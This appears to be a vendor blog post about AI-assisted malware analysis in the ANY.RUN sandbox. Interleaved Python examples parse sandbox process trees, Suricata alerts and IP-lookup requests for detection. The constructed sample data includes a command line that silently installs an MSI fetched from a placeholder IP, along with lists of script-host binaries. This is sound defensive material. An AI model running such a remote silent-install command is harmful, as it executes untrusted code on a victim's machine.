Artificial Intelligence (AI) proves invaluable in a myriad of contexts, including cybersecurity. Its ability to process large amounts of data, learn from patterns, and adapt to new situations makes it ideal for analyzing viruses and other malware. Here are key areas where AI plays a significant role in malware analysis.
Process Tree Analysis
Inspecting processes as part of malware analysis involves examining the behavior of the system as a whole or of individual processes. It helps:
- Identify process injection techniques employed by malware to execute malicious code within legitimate processes
- Analyze process interactions to reveal suspicious relationships
- Monitor resource usage to detect resource-intensive malware activities
- Examine process loading and unloading events to uncover advanced malware tactics
- Investigate process origins to assess potential risks associated with individual processes.
How Artificial Intelligence Can Assist in Examining Malware Processes
One of the possible ways to use AI to study malicious processes is via the ANY.RUN sandbox.
This cloud service not only provides advanced tools for investigating suspicious files and URLs, but also integrates several Artificial intelligence modules that make it easier for security analysts to understand the behavior of different threats.
Check out this sandbox analysis of an .xz archive containing Agent Tesla, one of the most widespread malware families.
Analysis of Agent Tesla in ANY.RUN
Apart from providing a complete overview of the threat’s network, registry, and file system activities, the service also offers ChatGPT-generated reports for each process recorded during the malware’s execution.
AI report on the malicious process in ANY.RUN
Above, you can see an AI report for the process related to the main file. The report summarizes the sandbox analysis, providing the following insights into the malicious activities associated with the process:
- Reading sensitive information from the registry
- Stealing personal data and credentials
- Checking for external IP
- Connecting to SMTP port
- Attempting to transmit email messages via SMTP
The AI also explains these activities, helping the user understand how the malware operates on the system.
Try AI malware reports with a free ANY.RUN account!
Command Line
Malware might use command line arguments to execute embedded scripts, launch additional malicious processes, or modify system configurations. By reviewing command history, analysts can identify patterns of malicious activity, such as repeated attempts to access restricted resources or execute unauthorized commands, which could signify a compromised account or an ongoing attack.
How AI Helps Investigate Command Lines
In this sandbox session, we observe the execution of Latrodectus, a relatively new malware family with extensive data stealing capabilities.
The process tree lets us see that during the analysis, “wscript.exe” was launched via the command line.
AI reveals malicious script execution by Latrodectus
By clicking on the corresponding AI report, we discover that this process was likely initiated by the malware to deploy a malicious JavaScript script.
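The process-tree checks listed above and the wscript.exe command line from this session can be reproduced outside the sandbox UI. The following is an added example, not ANY.RUN's code: it rebuilds a process tree from constructed sandbox-style events, flags script and installer hosts, and pulls the script paths and URLs out of their command lines. The event list, the file names and the TEST-NET-2 address are all constructed.

```python
# Added example (not ANY.RUN's code): rebuild a process tree from sandbox
# process events and flag script/installer hosts together with their full
# ancestry and the artifacts named on their command line. Events are constructed.
import re

# Constructed events: (pid, ppid, image, command line); the IP is from the
# TEST-NET-2 documentation range and is not a real indicator.
EVENTS = [
    (1000, 1, "explorer.exe", "explorer.exe"),
    (2100, 1000, "7zFM.exe", r'"C:\Program Files\7-Zip\7zFM.exe" C:\Users\u\Downloads\invoice.xz'),
    (2200, 2100, "invoice.exe", r"C:\Users\u\AppData\Local\Temp\invoice.exe"),
    (2300, 2200, "wscript.exe", r'wscript.exe //B "C:\Users\u\AppData\Local\Temp\update.js"'),
    (2400, 2300, "msiexec.exe", r"msiexec.exe /i http://198.51.100.7/pkg.msi /qn"),
    (2500, 1000, "notepad.exe", "notepad.exe"),
]

# Windows binaries that turn a command line into code execution or a silent install
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "msiexec.exe"}
SCRIPT_RE = re.compile(r'[^"\s]+\.(?:js|jse|vbs|vbe|hta|ps1)\b', re.I)
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)


def index_processes(events):
    """Map pid -> (ppid, image, command line) so parents can be walked."""
    return {pid: (ppid, image, cmd) for pid, ppid, image, cmd in events}


def ancestry(by_pid, pid):
    """Image names from the root ancestor down to pid."""
    chain = []
    while pid in by_pid:
        ppid, image, _ = by_pid[pid]
        chain.append(image)
        pid = ppid
    return chain[::-1]


def flag_script_hosts(events):
    """One finding per script/installer host: pid, parent chain, script paths and URLs."""
    by_pid = index_processes(events)
    findings = []
    for pid, (_, image, cmd) in by_pid.items():
        if image.lower() in SCRIPT_HOSTS:
            findings.append({
                "pid": pid,
                "chain": " > ".join(ancestry(by_pid, pid)),
                "scripts": SCRIPT_RE.findall(cmd),
                "urls": URL_RE.findall(cmd),
            })
    return findings
```

Running `flag_script_hosts(EVENTS)` yields two findings: the wscript.exe launch with its .js path, and the msiexec.exe child with the download URL, each with the full parent chain back to explorer.exe.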
Suricata Rule Detection
Suricata is an open-source tool used for network security monitoring, intrusion detection, and prevention. When a Suricata rule is triggered, it signifies a potential security threat based on predefined rules and signatures. Understanding these triggers involves investigating the rule that was triggered, the corresponding event data, and the context in which it occurred. This detailed analysis provides insight into the threat, its potential impact, and the appropriate response strategy.
How AI Helps Understand Suricata Detection
Thanks to the ChatGPT integration, ANY.RUN offers detailed AI-generated explanations of each Suricata detection instance.
Let’s continue with our analysis of Latrodectus.
Suricata rule used for detecting MSI file downloads
By navigating to the triggered Suricata rule and clicking on the ChatGPT icon, we can access the AI report.
AI overview of the triggered Suricata rule
The AI message informs us about a “Potential Corporate Privacy Violation” caused by traffic from the source IP to the destination IP over port 80. The report also indicates that it is a request for downloading and installing MSI files.
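The three things the section says an analyst must pull together for a Suricata hit (the rule, the flow it fired on, and the request context) are all present in Suricata's eve.json output. The following is an added example, not ANY.RUN's code, that triages constructed eve.json lines into that summary; the signature text and sid are placeholders rather than a real rule, and the IPs are documentation addresses.

```python
# Added example (not ANY.RUN's code): triage Suricata alerts from eve.json,
# joining each alert's rule metadata with its flow endpoints and the HTTP
# request that carried it. Log lines are constructed, with documentation IPs.
import json
from collections import Counter

# Constructed eve.json lines; the signature text and sid are placeholders,
# not a real ET/Suricata rule. The category string is Suricata's wording for
# the policy-violation classtype.
EVE_LINES = """
{"timestamp":"2024-05-01T10:00:01.000000+0000","event_type":"flow","src_ip":"192.0.2.10","dest_ip":"198.51.100.7","proto":"TCP"}
{"timestamp":"2024-05-01T10:00:02.000000+0000","event_type":"alert","src_ip":"192.0.2.10","src_port":49812,"dest_ip":"198.51.100.7","dest_port":80,"proto":"TCP","app_proto":"http","alert":{"action":"allowed","gid":1,"signature_id":9000001,"rev":1,"signature":"CONSTRUCTED POLICY MSI file download request","category":"Potential Corporate Privacy Violation","severity":1},"http":{"hostname":"198.51.100.7","url":"/pkg.msi","http_method":"GET","http_user_agent":"Windows Installer","status":200,"length":1048576}}
{"timestamp":"2024-05-01T10:00:03.000000+0000","event_type":"http","src_ip":"192.0.2.10","dest_ip":"198.51.100.7","http":{"hostname":"198.51.100.7","url":"/favicon.ico","http_method":"GET"}}
""".strip().splitlines()


def parse_alerts(lines):
    """Yield only alert events, skipping blank or malformed lines."""
    for line in lines:
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue
        if rec.get("event_type") == "alert":
            yield rec


def summarize(rec):
    """Flatten one alert into what an analyst reads first: the rule, the flow
    it fired on and the HTTP request (if any) that triggered it."""
    a, h = rec["alert"], rec.get("http")
    return {
        "sid": a["signature_id"],
        "signature": a["signature"],
        "category": a["category"],
        "severity": a["severity"],
        "flow": f'{rec["src_ip"]}:{rec.get("src_port")} -> {rec["dest_ip"]}:{rec.get("dest_port")}/{rec["proto"]}',
        "request": f'{h["http_method"]} {h["hostname"]}{h["url"]}' if h else None,
        # an MSI fetched over plain HTTP is the installer download the rule above flags
        "installer_fetch": bool(h) and h.get("url", "").lower().endswith(".msi"),
    }


def triage(lines):
    """Per-alert summaries plus a hit count per signature."""
    summaries = [summarize(r) for r in parse_alerts(lines)]
    return summaries, Counter(s["signature"] for s in summaries)
```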
HTTP Connections
Analyzing HTTP connection data is crucial in detecting network-based threats. Malware often communicates with its Command and Control (C&C) servers via HTTP connections to receive instructions or exfiltrate data. By reviewing HTTP connection data, cybersecurity professionals can identify suspicious network activity, such as unusual data transfer patterns, unauthorized connections, or connections to known malicious IP addresses.
AI Analysis of HTTP Connections
Let’s take a look at this sandbox session, which once again involves Agent Tesla.
When reviewing the detected HTTP requests, we come across a suspicious ip-api[.]com[/]line/?fields[=]hosting connection.
AI report on the suspicious HTTP connection
When we click on the ChatGPT icon, we receive an explanation that it is the malware’s potential attempt to determine if it is operating within a virtual environment.
It does this by requesting information about the device’s IP address to establish whether it is residential or hosting-based.
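The ip-api.com request above is a useful detection signal on its own: a process asking an external-IP service for the hosting field is checking whether it is running on datacenter infrastructure. The following is an added example, not ANY.RUN's code, that refangs indicators written in the defanged form used in this article and classifies HTTP requests as external-IP lookups and, more narrowly, as hosting checks. ip-api.com is the service named above; the other three lookup hosts and the sample requests are assumed additions.

```python
# Added example (not ANY.RUN's code): refang defanged indicators copied from a
# report and classify HTTP requests as external-IP lookups or as the
# residential-vs-hosting check described above. Sample requests are constructed.
from urllib.parse import parse_qs, urlsplit

# Public-IP lookup services. ip-api.com is the one seen in the analysis above;
# the other three are assumed additions to show the check generalises.
IP_LOOKUP_HOSTS = {"ip-api.com", "ipinfo.io", "api.ipify.org", "icanhazip.com"}
# ip-api query fields that classify the caller's network rather than locate it
HOSTING_FIELDS = {"hosting", "proxy", "as", "asname"}
DEFANG = [("hxxp", "http"), ("[.]", "."), ("[/]", "/"), ("[=]", "="), ("[:]", ":")]

# Constructed sample: the defanged request from the report, two other lookups
# and a plain download from a TEST-NET-2 address.
REQUESTS = [
    "ip-api[.]com[/]line/?fields[=]hosting",
    "http://ip-api.com/json/?fields=status,country,isp",
    "https://api.ipify.org/?format=text",
    "http://198.51.100.7/pkg.msi",
]


def refang(indicator):
    """Reverse common defanging so the URL can be parsed; assume http if no scheme."""
    for bad, good in DEFANG:
        indicator = indicator.replace(bad, good)
    return indicator if "://" in indicator else "http://" + indicator


def classify(url):
    """Label a request: is it an external-IP lookup, and does it request the
    fields that reveal whether the caller sits on a hosting or proxy network?"""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    fields = {f for v in parse_qs(parts.query).get("fields", []) for f in v.split(",")}
    is_lookup = host in IP_LOOKUP_HOSTS
    return {
        "host": host,
        "ip_lookup": is_lookup,
        "hosting_check": is_lookup and bool(fields & HOSTING_FIELDS),
        "fields": sorted(fields),
    }


def classify_requests(requests):
    """Refang and classify a batch of request strings in order."""
    return [classify(refang(r)) for r in requests]
```

Only the first request is labelled a hosting check; the second is an IP lookup that asks for location fields only, which is the distinction that separates the evasion probe from an ordinary geolocation call.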
Conclusion
AI’s role in malware analysis is multifaceted and critical. It automates complex tasks, providing insightful analysis and enabling real-time threat detection.
Use the free ANY.RUN sandbox to conduct advanced malware and phishing analysis with AI assistance!